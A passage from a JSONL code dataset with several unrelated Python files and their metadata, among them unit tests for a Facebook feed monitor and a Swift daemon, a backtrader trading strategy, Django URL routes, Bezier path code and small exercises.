\r\n","sub_path":"18/submissions/save2_nopass.py","file_name":"save2_nopass.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"294835371","text":"fname = input(\"Enter the file name: \")\r\ntry:\r\n fhand = open(fname, 'r')\r\nexcept:\r\n print(\"File cannot be opened:\", fname)\r\n exit()\r\n\r\nemails = dict()\r\nfor line in fhand:\r\n if line.startswith(\"From \"):\r\n line = line.split()\r\n email = line[1]\r\n emails[email] = emails.get(email, 0) + 1\r\n\r\nprint(emails)\r\n","sub_path":"py4e-9-3.py","file_name":"py4e-9-3.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"446745843","text":"''' Test the NewsFeedMonitor class '''\n\nimport configparser\nimport os\nimport uuid\n\nimport mock\nimport pytest\n\nfrom facebook_monitor_mailer.monitor import NewsFeedMonitor\n\n\nclass MockPost(object):\n ''' Mock for posts returned by feed_posts '''\n def __init__(self, post_id, flag=None, json_data=None):\n self.post_id = post_id\n self.flag = flag\n self.json_data = json_data\n self.flagged = mock.Mock(return_value=flag)\n self.keywords = mock.Mock(return_value=['kw', post_id])\n self.message_body = mock.Mock(return_value=post_id + '_body')\n\n\n@pytest.fixture\ndef monitor_config():\n ''' Create config object from test_config.ini '''\n config = configparser.ConfigParser()\n config.read('tests/test_config.ini')\n return config\n\n\n@pytest.fixture\ndef monitor(monitor_config):\n ''' Simple monitor config '''\n return NewsFeedMonitor(monitor_config)\n\n\n@mock.patch('requests.get')\n@mock.patch(\n 'facebook_monitor_mailer.monitor.NewsFeedPost.from_json',\n side_effect=lambda data: data + '_processed')\ndef test_feed_posts(mock_post_from_json, mock_requests_get, monitor):\n ''' test data got from valid request is fed to Post creator '''\n # elaborate mock setup??\n feed_data_json = mock.MagicMock()\n feed_data_json.json = mock.MagicMock(return_value={\n 'data': ['post_1_data', 'post_2_data']})\n mock_requests_get.return_value = feed_data_json\n # run and test\n posts = monitor.feed_posts()\n mock_requests_get.assert_called_once_with(\n 'https://graph.facebook.com/v2.3/me/home', params={\n 'access_token': 'token', 'format': 'json'})\n mock_post_from_json.assert_has_calls([\n mock.call('post_1_data'), mock.call('post_2_data')])\n assert posts == ['post_1_data_processed', 'post_2_data_processed']\n\n\n@mock.patch('requests.get')\ndef test_feed_posts_bad_data(mock_requests_get, monitor):\n ''' Test correct exception raised ** and logged ** when request returns\n bad result '''\n # elaborate mock setup??\n feed_data_json = mock.MagicMock()\n feed_data_json.json = mock.MagicMock(return_value={'auth': 'failed'})\n mock_requests_get.return_value = feed_data_json\n # run and test\n with pytest.raises(ValueError):\n monitor.feed_posts()\n feed_data_json.json.assert_called_once_with()\n mock_requests_get.assert_called_once_with(\n 'https://graph.facebook.com/v2.3/me/home', params={\n 'access_token': 'token', 'format': 'json'})\n # test that logging is also done on failure (patch log function)\n\n\n@mock.patch(\n 'facebook_monitor_mailer.monitor.NewsFeedMonitor.feed_posts',\n return_value=[\n MockPost('id1', True), MockPost('id2', False), MockPost('id3', True),\n MockPost('id4', False)])\ndef test_flag_posts(mock_feed_posts, monitor):\n ''' Check correct posts are processed and flagged, and records updated '''\n monitor.processed_post_ids.update(['id1', 'id2'])\n flagged_posts = monitor.flag_posts()\n assert flagged_posts == [mock_feed_posts.return_value[2]]\n assert not mock_feed_posts.return_value[0].flagged.called\n assert not mock_feed_posts.return_value[1].flagged.called\n mock_feed_posts.return_value[2].flagged.assert_called_once_with(\n {'keywords': ['kw1', 'kw2']})\n mock_feed_posts.return_value[3].flagged.assert_called_once_with(\n {'keywords': ['kw1', 'kw2']})\n # check numbers fed to logging\n assert monitor.processed_post_ids == {'id1', 'id2', 'id3', 'id4'}\n assert monitor.keyword_counter == {'id3': 1, 'id4': 1, 'kw': 2}\n\n\n@mock.patch(\n 'facebook_monitor_mailer.monitor.NewsFeedMonitor.feed_posts',\n side_effect=ValueError)\ndef test_flag_posts_exception(mock_feed_posts, monitor):\n ''' Test correct response if feed_posts throws an exeption '''\n assert monitor.flag_posts() == []\n mock_feed_posts.assert_called_once_with()\n # test that failure logging is done\n\n\n@mock.patch(\n 'pyramid_mailer.mailer.Mailer.from_settings')\ndef test_monitor_settings(mock_pyr_mailer, monitor_config):\n ''' Test correct parsing of settings structure to pyramid mailer '''\n monitor = NewsFeedMonitor(monitor_config)\n mock_pyr_mailer.assert_called_once_with({\n 'mail.host': 'host', 'mail.port': 123, 'mail.ssl': True,\n 'mail.username': 'username', 'mail.password': 'password'\n })\n assert monitor.post_flag_settings['keywords'] == ['kw1', 'kw2']\n assert monitor.access_token == 'token'\n\n\n@mock.patch(\n 'pyramid_mailer.message.Message', side_effect=['message1', 'message2'])\n@mock.patch('facebook_monitor_mailer.monitor.transaction')\ndef test_mail_flagged_posts(mock_transaction, mock_pyr_message, monitor):\n ''' Test correct construction and handling of emailing posts '''\n monitor.mailer = mock.MagicMock()\n posts = [MockPost('a1'), MockPost('a2')]\n monitor.flag_posts = mock.MagicMock(return_value=posts)\n monitor.mail_flagged_posts()\n monitor.flag_posts.assert_called_once_with()\n monitor.mailer.send.assert_has_calls([\n mock.call('message1'), mock.call('message2')])\n mock_pyr_message.assert_has_calls([\n mock.call(\n subject='NewsFeedMonitor flagged post with id a1',\n sender='username', recipients=['recipient'],\n body='a1_body'),\n mock.call(\n subject='NewsFeedMonitor flagged post with id a2',\n sender='username', recipients=['recipient'],\n body='a2_body')\n ])\n posts[0].message_body.assert_called_once_with()\n posts[1].message_body.assert_called_once_with()\n mock_transaction.commit.assert_called_once_with()\n\n\n@mock.patch('facebook_monitor_mailer.monitor.transaction')\ndef test_mail_no_flagged_posts(mock_transaction, monitor):\n ''' Test no errors when no flagged posts are returned '''\n monitor.mailer = mock.MagicMock()\n monitor.flag_posts = mock.MagicMock(return_value=[])\n monitor.mail_flagged_posts()\n monitor.flag_posts.assert_called_once_with()\n monitor.mailer.assert_not_called()\n mock_transaction.assert_not_called()\n\n\ndef test_shelve_unshelve(monitor_config):\n ''' Test that processed post ids can be stored '''\n # shelve from one monitor\n monitor1 = NewsFeedMonitor(monitor_config)\n monitor1.processed_post_ids.update([\n 'id1', 'id2', 'id3'])\n shelf_file = os.path.join('store', str(uuid.uuid4()))\n monitor1.shelve_processed(shelf_file)\n # unshelve from a new monitor reading the same file\n monitor2 = NewsFeedMonitor(monitor_config)\n monitor2.processed_post_ids.update([\n 'id4', 'id5'])\n monitor2.unshelve_processed(shelf_file)\n assert monitor2.processed_post_ids == {\n 'id1', 'id2', 'id3', 'id4', 'id5'}\n\n\ndef test_bad_shelve_unshelve(monitor):\n ''' Test handling of bad shelf file path without exceptions.\n TODO: log level warn should be given.'''\n # non-existent directory for files\n monitor.shelve_processed('store/store/shelf')\n monitor.unshelve_processed('store/store/shelf')\n # blank shelf file (no key to retrieve)\n monitor.unshelve_processed(os.path.join('store', str(uuid.uuid4())))\n","sub_path":"tests/test_monitor.py","file_name":"test_monitor.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"589596834","text":"\"\"\"Tests for wait_for_deploy\"\"\"\nfrom contextlib import contextmanager\n\nimport pytest\n\nfrom wait_for_deploy import wait_for_deploy\n\n\npytestmark = pytest.mark.asyncio\n\n\nasync def test_wait_for_deploy(mocker):\n \"\"\"wait_for_deploy should poll deployed web applications\"\"\"\n matched_hash = 'match'\n mismatch_hash = 'mismatch'\n fetch_release_patch = mocker.patch('wait_for_deploy.fetch_release_hash', autospec=True, side_effect=[\n mismatch_hash,\n mismatch_hash,\n matched_hash,\n ])\n check_output_patch = mocker.patch(\n 'wait_for_deploy.check_output',\n autospec=True,\n return_value=\" {} \".format(matched_hash).encode(),\n )\n validate_patch = mocker.patch('wait_for_deploy.validate_dependencies', autospec=True)\n\n @contextmanager\n def fake_init(*args, **kwargs): # pylint: disable=unused-argument\n \"\"\"Fake empty contextmanager\"\"\"\n yield\n\n init_working_dir_mock = mocker.patch('wait_for_deploy.init_working_dir', side_effect=fake_init)\n sleep_sync_mock = mocker.Mock()\n\n async def sleep_fake(*args, **kwargs):\n \"\"\"await cannot be used with mock objects\"\"\"\n sleep_sync_mock(*args, **kwargs)\n\n mocker.patch('asyncio.sleep', sleep_fake)\n\n repo_url = 'repo_url'\n token = 'token'\n hash_url = 'hash'\n watch_branch = 'watch'\n await wait_for_deploy(\n github_access_token=token,\n repo_url=repo_url,\n hash_url=hash_url,\n watch_branch=watch_branch,\n )\n\n validate_patch.assert_called_once_with()\n check_output_patch.assert_called_once_with([\"git\", \"rev-parse\", \"origin/{}\".format(watch_branch)])\n fetch_release_patch.assert_any_call(hash_url)\n assert fetch_release_patch.call_count == 3\n init_working_dir_mock.assert_called_once_with(token, repo_url)\n","sub_path":"wait_for_deploy_test.py","file_name":"wait_for_deploy_test.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"255629072","text":"\nimport ctypes\nimport weld\n\nconf = weld.WeldConf()\ncontext = weld.WeldContext(conf)\n\nmodule = weld.WeldModule(\"|x: i32| x + 10\", conf)\n\npointer = ctypes.POINTER(ctypes.c_int)\nb = ctypes.c_int(20)\n\nvalue = weld.WeldValue(ctypes.addressof(b))\nresult = module.run(context, value)\n\nty = module.return_type()\nprint(str(ty))\n\ndata = result.data()\ndata = ctypes.cast(data, pointer)\nprint(\"Result:\", data.contents)\nprint(\"Memory usage:\", context.memory_usage(), \"bytes\")\n\n\n# Try to compile a module that fails.\ntry:\n module = weld.WeldModule(\"|x: i32| x + 10 + whoops\", conf)\nexcept weld.WeldError as e:\n print(e)\n\n\n","sub_path":"weld-python/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"73512713","text":"def elective():\r\n myDic = {'2CPR2B': 'C Language',\r\n '1UNX1B': 'Intro to UNIX',\r\n '3SH414': 'Shell Programming',\r\n '4PL400': 'Perl Programming'}\r\n\r\n sortedDic = iter(sorted(myDic.items())) #sorts the iterations (keys) in order\r\n\r\n for key,value in sortedDic:\r\n print (key,value) #prints the sorted key and value\r\n\r\n while True:\r\n enter = input('\\nEnter code number of course (-1 to exit)\\n')\r\n if enter == '-1': #exit case\r\n break\r\n\r\n if enter in myDic.keys(): #if key is present print. else none\r\n print(\"You will be taking\",myDic.get(enter),\"this semester.\")\r\n\r\nif __name__ == '__main__':\r\n elective()","sub_path":"Python/Python Dictionary.py","file_name":"Python Dictionary.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"6104876","text":"from django.conf.urls import url, include\nfrom simplemooc.courses import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n #url(r'^(?P\\d+)/$', views.details, name='details'),\n url(r'^(?P[\\w_-]+)/$', views.details, name='details'),\n url(r'^(?P[\\w_-]+)/inscricao/$', views.enrollment, name='enrollment'),\n url(r'^(?P[\\w_-]+)/cancelar-inscricao/$', views.undo_enrollment,\n name='undo_enrollment'),\n url(r'^(?P[\\w_-]+)/anuncios/$', views.announcements,\n name='announcements'),\n url(r'^(?P[\\w_-]+)/anuncios/(?P\\d+)/$', views.show_announcement,\n name='show_announcement'),\n url(r'^(?P[\\w_-]+)/aulas/$', views.lessons,\n name='lessons'),\n url(r'^(?P[\\w_-]+)/aulas/(?P\\d+)/$', views.lesson,\n name='lesson'),\n url(r'^(?P[\\w_-]+)/materiais/(?P\\d+)/$', views.material,\n name='material'),\n]\n","sub_path":"simplemooc/courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"132756621","text":"import backtrader as bt\nimport datetime as dt\nimport argparse\nimport DBconnect\nimport Const\n\ndatabase = None\ntrade_type = 0 # 0 is short, 1 is long\nNumberOfWins, NumberOfLoss, buytime, buyprice, total_trades, sum_profit = (0,) * 6\nPlaceOrdersAmt = 1\nStockNo = 'MTX00'\nAnalysisMode = 1 # 0 is execution, 1 is analysis\n\n\nclass TheStrategy(bt.Strategy):\n params = (\n # Standard MACD Parameters\n ('macd1', 5),\n ('macd2', 35),\n ('macdsig', 5),\n ('atrdist', 3.0),\n ('onlydaily', False),\n )\n\n def __init__(self):\n self.macd = bt.indicators.MACDHisto(self.data,\n period_me1=self.p.macd1,\n period_me2=self.p.macd2,\n period_signal=self.p.macdsig)\n self.atr = bt.indicators.ATR(self.data, period=8)\n\n if not self.p.onlydaily:\n self.sma_day5 = bt.ind.SMA(self.data1, period=5)\n self.sma_day20 = bt.ind.SMA(self.data1, period=20)\n\n self.sma_vol5 = bt.ind.SMA(self.data.volume, period=5)\n self.sma_vol20 = bt.ind.SMA(self.data.volume, period=20)\n self.sma_vol10 = bt.ind.SMA(self.data.volume, period=10)\n\n self.data1.plotinfo.plot = True\n\n def notify_trade(self, trade):\n global sum_profit, total_trades, NumberOfWins, NumberOfLoss\n if not trade.isclosed:\n return\n\n print('OPERATION PROFIT, GROSS %.2f, NET %.2f SUM %.2f ' % (trade.pnl, trade.pnlcomm, sum_profit))\n if trade.pnl > 0:\n NumberOfWins = NumberOfWins + 1\n else:\n NumberOfLoss = NumberOfLoss + 1\n sum_profit = sum_profit + trade.pnl\n total_trades = total_trades + 1\n if trade.long:\n self.pnl = trade.pnl\n else:\n self.pnl = -trade.pnl\n # because True is 1, we need convert it to 0 which represent buy\n database.InsertPerfLog('TheStraAlpha', bt.num2date(trade.dtopen), bt.num2date(trade.dtclose), trade.price, trade.price + self.pnl, int(not trade.long))\n\n def notify_order(self, order):\n global buyprice, buytime\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enougth cash\n if order.status in [order.Completed]:\n if order.isbuy():\n buyprice = order.executed.price\n buytime = bt.num2date(order.executed.dt)\n print('Buy EXECUTED, Time: %s, Price: %.2f ' % (bt.num2date(order.executed.dt), order.executed.price))\n else:\n buyprice = order.executed.price\n buytime = bt.num2date(order.executed.dt)\n print('Sell EXECUTED, Time: %s, Price: %.2f ' % (bt.num2date(order.executed.dt), order.executed.price))\n elif order.status in [order.Canceled, order.Margin]:\n print('%s ,' % order.Status[order.status])\n pass # Simply log\n self.order = None # indicate no order is pending\n\n def next(self):\n global total_trades, trade_type, buyprice, buytime\n\n settlement_day = False\n tradeopen = 0\n tradeclose = 0\n if (self.data.datetime.datetime().weekday() == 2 and 15 <= self.data.datetime.datetime().day <= 21) or \\\n (self.data.datetime.datetime().weekday() == 3 and 15 <= self.data.datetime.datetime().day <= 22):\n settlement_day = True\n\n if not self.position:\n if self.macd.signal[0] < 0 and self.macd[0] >= 0.0:\n trade_type = 1\n tradeopen = 1\n if self.macd.signal[0] >= 0 and self.macd[0] < 0:\n trade_type = 0\n tradeopen = 1\n pdist = self.atr[0] * self.p.atrdist\n buyprice = self.data0.close[0]\n self.pstop = self.data0.close[0] - pdist\n elif self.position:\n pclose = self.data.close[0]\n pstop = self.pstop\n\n if settlement_day and str(self.data.datetime.datetime().time()) == '13:25:00':\n tradeclose = 1\n elif (pstop > pclose) and trade_type == 1:\n tradeclose = 1\n elif (pstop > pclose + 30) and trade_type == 0:\n tradeclose = 1\n else:\n pdist = self.atr[0] * self.p.atrdist\n self.pstop = max(pstop, pclose - pdist)\n\n if tradeopen == 1 and trade_type == 0:\n matched = database.CheckMatchedOrder(StockNo, self.data.datetime.datetime(), 0, AnalysisMode)\n if matched == 0:\n self.buy(data=self.datas[0])\n database.InsertOrder(StockNo, self.data.datetime.datetime(), 0, PlaceOrdersAmt, buyprice, buyprice + 2, Const.NoDayTrade, Const.TradeTypeROD)\n elif tradeopen == 1 and trade_type == 1:\n matched = database.CheckMatchedOrder(StockNo, self.data.datetime.datetime(), 1, AnalysisMode)\n if matched == 0:\n self.sell(data=self.datas[0])\n database.InsertOrder(StockNo, self.data.datetime.datetime(), 1, PlaceOrdersAmt, buyprice, buyprice - 2, Const.NoDayTrade, Const.TradeTypeROD)\n elif tradeclose == 1 and trade_type == 0:\n matched = database.CheckMatchedOrder(StockNo, self.data.datetime.datetime(), 1, AnalysisMode)\n if matched == 0:\n self.close(coc=True)\n database.InsertOrder(StockNo, self.data.datetime.datetime(), 1, PlaceOrdersAmt, pclose, pclose + 2, Const.NoDayTrade, Const.TradeTypeROD)\n elif tradeclose == 1 and trade_type == 1:\n matched = database.CheckMatchedOrder(StockNo, self.data.datetime.datetime(), 0, AnalysisMode)\n if matched == 0:\n self.close(coc=True)\n database.InsertOrder(StockNo, self.data.datetime.datetime(), 0, PlaceOrdersAmt, pclose, pclose - 2, Const.NoDayTrade, Const.TradeTypeROD)\n\n\ndef runstrat(args=None):\n global sum_profit, total_trades, database, NumberOfWins, NumberOfLoss\n\n database = None\n database = DBconnect.DBconnect('localhost', 'trader', 'trader')\n database.Connect()\n\n database.InsertExecLog('3.1 Backtrader Starting')\n database.ClearPerfLog()\n\n args = parse_args(args)\n\n cerebro = bt.Cerebro()\n cerebro.broker.set_cash(args.cash)\n cerebro.broker.set_coc(True)\n\n fromdate = dt.datetime(2019, 7, 15)\n todate = dt.datetime(2019, 12, 31)\n\n data0 = bt.feeds.MySQLData(fromdate=fromdate, todate=todate, server='localhost', username='trader', password='trader', stockID='TX00', KLine='5', Session=1, timeframe=bt.TimeFrame.Minutes)\n data1 = bt.feeds.MySQLData(fromdate=fromdate, todate=todate, server='localhost', username='trader', password='trader', stockID='TX00', KLine='0', Session=1, timeframe=bt.TimeFrame.Days)\n\n cerebro.adddata(data0)\n cerebro.adddata(data1)\n\n # args for the strategy, period is a MUST why??\n cerebro.addstrategy(TheStrategy, onlydaily=args.onlydaily, )\n\n # cerebro.addstrategy(testStrategy,)\n cerebro.run()\n if total_trades == 0: total_trades = 1\n print('Sum of profit ', sum_profit)\n print('Number of trades ', total_trades)\n print('Profit per trans %.2f' % (sum_profit / total_trades))\n print('Total Fee in currency %.2f' % (total_trades * 50))\n print('Total profit in currency %.2f' % (sum_profit * 50 - total_trades * 50))\n print('Total wins %i ' % NumberOfWins)\n print('Total loss %i' % NumberOfLoss)\n print('Winning Percentage %.2f' % (NumberOfWins / total_trades * 100))\n cerebro.plot()\n\n\ndef parse_args(pargs=None):\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Sample for Tharp example with MACD')\n\n parser.add_argument('--cash', required=False, action='store',\n type=float, default=500000,\n help=('Cash to start with'))\n\n parser.add_argument('--period', default=50, required=False, type=int,\n help='Period to apply to indicator')\n\n parser.add_argument('--onlydaily', action='store_true',\n help='Indicator only to be applied to daily timeframe')\n\n if pargs is not None:\n return parser.parse_args(pargs)\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n runstrat()\n","sub_path":"SampleStragety.py","file_name":"SampleStragety.py","file_ext":"py","file_size_in_byte":8494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"128954364","text":"import string\n#crear un alfabeto\n\"\"\"def create_abc():\n for letter in range(ord('a'),ord('z')+1):\n print(chr(letter))\n\"\"\"\n\ndef encrypt(text, key): \n abc = string.ascii_lowercase # space = ASCII -> 32\n x = ''\n aux = 0\n for letter in text:\n if letter == ' ':\n x += '%'\n else:\n position = aux % len(key)\n x += abc[int((abc.index(letter) + int(abc.index(key[position]))) % len(abc))]\n aux+=1\n return x","sub_path":"54041-Daniel-Balda/Practica primer parcial/cifrado.py","file_name":"cifrado.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213839377","text":"import math\nimport bezier_conversion\n\nclass Coordinate:\n\tdef __init__(self, x, y, rot):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.rot = rot\n\n\tdef __repr__(self):\n\t\treturn(str(self.x) + \" \" + str(self.y) + \" \" + str(self.rot))\n\ndef create_path(start_x, start_y, start_rot, end_x, end_y, end_rot, handle_influence):\n\tangle_1 = start_rot\n\tx1, y1 = (start_x, start_y)\n\n\tangle_2 = end_rot\n\tx2, y2 = (end_x, end_y)\n\n\tlength = handle_influence\n\thandle_1_dx = length * math.cos(angle_1)\n\thandle_1_dy = length * math.sin(angle_1)\n\n\thandle_2_dx = length * math.cos(angle_2)\n\thandle_2_dy = length * math.sin(angle_2)\n\n\tP0_x = x1\n\tP0_y = y1\n\n\tP1_x = x1 + (handle_1_dx/2)\n\tP1_y = y1 + (handle_1_dy/2)\n\n\tP2_x = x2 - (handle_2_dx/2)\n\tP2_y = y2 - (handle_2_dy/2)\n\n\tP3_x = x2\n\tP3_y = y2\n\n\tbezier_string = \"M\" + str(P0_x) + \",\" + str(P0_y) + \"C\" + str(P1_x) + \",\" + str(P1_y) + \",\" + str(P2_x) + \",\" + str(P2_y) + \",\" + str(P3_x) + \",\" + str(P3_y)\n\n\tbrick_path = bezier_conversion.Bezier(bezier_string)\n\tbrick_path.length_approximation(150.0)\n\n\tdt = 0.01\n\n\tspacing = 14\n\tbricks = int(math.floor(brick_path.length/spacing))\n\n\tspacing = brick_path.length/bricks\n\n\t#print(spacing)\n\n\tbrick_poses = []\n\t#print(brick_path.t_map)\n\n\tfor i in range(bricks+1):\n\t\ttry:\n\t\t\tt = brick_path.t_map[round(i*spacing,3)]\n\t\texcept KeyError:\n\t\t\tt = 1\n\t\t\n\t\tx = brick_path.B_x(t)\n\t\ty = brick_path.B_y(t)\n\t\t\n\t\tx = (x - 60) / 100\n\t\ty = (- y + 120) / 100 - 0.1\n\t\t\n\t\tdy = brick_path.B_y(t + dt) - brick_path.B_y(t - dt)\n\t\tdx = brick_path.B_x(t + dt) - brick_path.B_x(t - dt)\n\t\t\n\t\tangle = math.atan2(dy,dx)\n\n\t\t#print(x, y)\n\t\t\n\t\tnew_pose = Coordinate(x, y, angle)\n\t\tbrick_poses.append(new_pose)\n\t\t# print(brick_poses, brick_poses[-1].x)\n\n\treturn brick_poses\n\n\n","sub_path":"docs/dominoes_code/bezier_interpolation.py","file_name":"bezier_interpolation.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"586098889","text":"# Copyright (C) 2018 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"\nadd additional acl index\n\nCreate Date: 2018-05-14 02:47:55.761097\n\"\"\"\n# disable Invalid constant name pylint warning for mandatory Alembic variables.\n# pylint: disable=invalid-name\n\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '2795c6d50e62'\ndown_revision = '3db5f2027c92'\n\n\ndef upgrade():\n \"\"\"Upgrade database schema and/or data, creating a new revision.\"\"\"\n op.create_index(\n 'ix_person_object',\n 'access_control_list',\n ['person_id', 'object_type', 'object_id'],\n unique=False,\n )\n\n\ndef downgrade():\n \"\"\"Downgrade database schema and/or data back to the previous revision.\"\"\"\n op.drop_index('ix_person_object', table_name='access_control_list')\n","sub_path":"src/ggrc/migrations/versions/20180514024755_2795c6d50e62_add_additional_acl_index.py","file_name":"20180514024755_2795c6d50e62_add_additional_acl_index.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"84128012","text":"\"\"\"\nWrite a universal wrapper program that expects its \ncommand line arguments to contain the absolute path \nto any program, followed by its arguments. The wrapper \nshould run that program and report its exit value\n\"\"\"\n\nimport sys\nfrom subprocess import call\n\n\ndef executeExternalProgram(file_path, arguments=None):\n \"\"\"\n Contructs a python3 call to a program from command line.\n First argument is the file path. Subsequent arguments are\n passed through as arguments.\n \"\"\"\n call_command = ['python3', '{file_path}'.format(file_path=file_path)]\n for arg in arguments:\n call_command.append(arg)\n exit_value = call(call_command)\n if exit_value == 0:\n print('\\nProgram has successfully run. Exiting.')\n else:\n print('\\nProgram has run unsuccessfully with an error.')\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print('No program provided. Please provide a filepath to one.')\n else:\n file_path = sys.argv[1]\n executeExternalProgram(sys.argv[1], sys.argv[2:])","sub_path":"homework/homework11/aweise_homework11_cpython.py","file_name":"aweise_homework11_cpython.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"286391419","text":"# Copyright (c) 2010-2012 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# TODO(clayg): Test kill_children signal handlers\n\nimport os\nfrom six import StringIO\nfrom six.moves import reload_module\nimport time\nimport unittest\nfrom getpass import getuser\nimport logging\nfrom test.unit import tmpfile\nimport mock\nimport signal\n\nfrom swift.common import daemon, utils\n\n\nclass MyDaemon(daemon.Daemon):\n\n def __init__(self, conf):\n self.conf = conf\n self.logger = utils.get_logger(None, 'server', log_route='server')\n MyDaemon.forever_called = False\n MyDaemon.once_called = False\n\n def run_forever(self):\n MyDaemon.forever_called = True\n\n def run_once(self):\n MyDaemon.once_called = True\n\n def run_raise(self):\n raise OSError\n\n def run_quit(self):\n raise KeyboardInterrupt\n\n\nclass TestDaemon(unittest.TestCase):\n\n def test_create(self):\n d = daemon.Daemon({})\n self.assertEqual(d.conf, {})\n self.assertTrue(isinstance(d.logger, utils.LogAdapter))\n\n def test_stubs(self):\n d = daemon.Daemon({})\n self.assertRaises(NotImplementedError, d.run_once)\n self.assertRaises(NotImplementedError, d.run_forever)\n\n\nclass TestRunDaemon(unittest.TestCase):\n\n def setUp(self):\n utils.HASH_PATH_SUFFIX = 'endcap'\n utils.HASH_PATH_PREFIX = 'startcap'\n utils.drop_privileges = lambda *args: None\n utils.capture_stdio = lambda *args: None\n\n def tearDown(self):\n reload_module(utils)\n\n def test_run(self):\n d = MyDaemon({})\n self.assertFalse(MyDaemon.forever_called)\n self.assertFalse(MyDaemon.once_called)\n # test default\n d.run()\n self.assertEqual(d.forever_called, True)\n # test once\n d.run(once=True)\n self.assertEqual(d.once_called, True)\n\n def test_signal(self):\n d = MyDaemon({})\n with mock.patch('swift.common.daemon.signal') as mock_signal:\n mock_signal.SIGTERM = signal.SIGTERM\n d.run()\n signal_args, kwargs = mock_signal.signal.call_args\n sig, func = signal_args\n self.assertEqual(sig, signal.SIGTERM)\n with mock.patch('swift.common.daemon.os') as mock_os:\n func()\n self.assertEqual(mock_os.method_calls, [\n mock.call.killpg(0, signal.SIGTERM),\n # hard exit because bare except handlers can trap SystemExit\n mock.call._exit(0)\n ])\n\n def test_run_daemon(self):\n sample_conf = \"[my-daemon]\\nuser = %s\\n\" % getuser()\n with tmpfile(sample_conf) as conf_file:\n with mock.patch.dict('os.environ', {'TZ': ''}):\n with mock.patch('time.tzset') as mock_tzset:\n daemon.run_daemon(MyDaemon, conf_file)\n self.assertTrue(MyDaemon.forever_called)\n self.assertEqual(os.environ['TZ'], 'UTC+0')\n self.assertEqual(mock_tzset.mock_calls, [mock.call()])\n daemon.run_daemon(MyDaemon, conf_file, once=True)\n self.assertEqual(MyDaemon.once_called, True)\n\n # test raise in daemon code\n with mock.patch.object(MyDaemon, 'run_once', MyDaemon.run_raise):\n self.assertRaises(OSError, daemon.run_daemon, MyDaemon,\n conf_file, once=True)\n\n # test user quit\n sio = StringIO()\n logger = logging.getLogger('server')\n logger.addHandler(logging.StreamHandler(sio))\n logger = utils.get_logger(None, 'server', log_route='server')\n with mock.patch.object(MyDaemon, 'run_forever', MyDaemon.run_quit):\n daemon.run_daemon(MyDaemon, conf_file, logger=logger)\n self.assertTrue('user quit' in sio.getvalue().lower())\n\n # test missing section\n sample_conf = \"[default]\\nuser = %s\\n\" % getuser()\n with tmpfile(sample_conf) as conf_file:\n self.assertRaisesRegexp(SystemExit,\n 'Unable to find my-daemon '\n 'config section in.*',\n daemon.run_daemon, MyDaemon,\n conf_file, once=True)\n\n def test_run_daemon_diff_tz(self):\n old_tz = os.environ.get('TZ', '')\n try:\n os.environ['TZ'] = 'EST+05EDT,M4.1.0,M10.5.0'\n time.tzset()\n self.assertEqual((1970, 1, 1, 0, 0, 0), time.gmtime(0)[:6])\n self.assertEqual((1969, 12, 31, 19, 0, 0), time.localtime(0)[:6])\n self.assertEqual(18000, time.timezone)\n\n sample_conf = \"[my-daemon]\\nuser = %s\\n\" % getuser()\n with tmpfile(sample_conf) as conf_file:\n daemon.run_daemon(MyDaemon, conf_file)\n self.assertFalse(MyDaemon.once_called)\n self.assertTrue(MyDaemon.forever_called)\n\n self.assertEqual((1970, 1, 1, 0, 0, 0), time.gmtime(0)[:6])\n self.assertEqual((1970, 1, 1, 0, 0, 0), time.localtime(0)[:6])\n self.assertEqual(0, time.timezone)\n finally:\n os.environ['TZ'] = old_tz\n time.tzset()\n\n\nif __name__ == '__main__':\n 